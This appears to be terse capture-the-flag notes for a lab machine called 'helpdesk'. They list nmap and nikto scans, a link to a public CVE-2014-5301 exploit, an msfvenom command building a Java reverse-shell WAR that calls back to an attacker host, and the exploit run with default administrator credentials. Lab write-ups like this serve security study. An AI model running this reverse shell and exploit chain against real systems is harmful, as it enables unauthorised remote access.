nmap -A -p- -oA helpdesk 192.168.234.43 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA helpdesk 192.168.234.43

nmap -sU -O -p- -oA helpdesk-udp 192.168.234.43

nikto -h 192.168.234.43:80

Pasted image 20210920191644.png

http://192.168.234.43/

Pasted image 20210920191726.png

http://192.168.234.43:8080

Pasted image 20210920191816.png

https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py

msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.234 LPORT=445 -f war > /home/kali/Desktop/shell.war

python3 exploit.py 192.168.234.43 8080 administrator administrator shell.war

Pasted image 20210920192119.png

boxes

copyright©2022 Cu3rv0x all rights reserved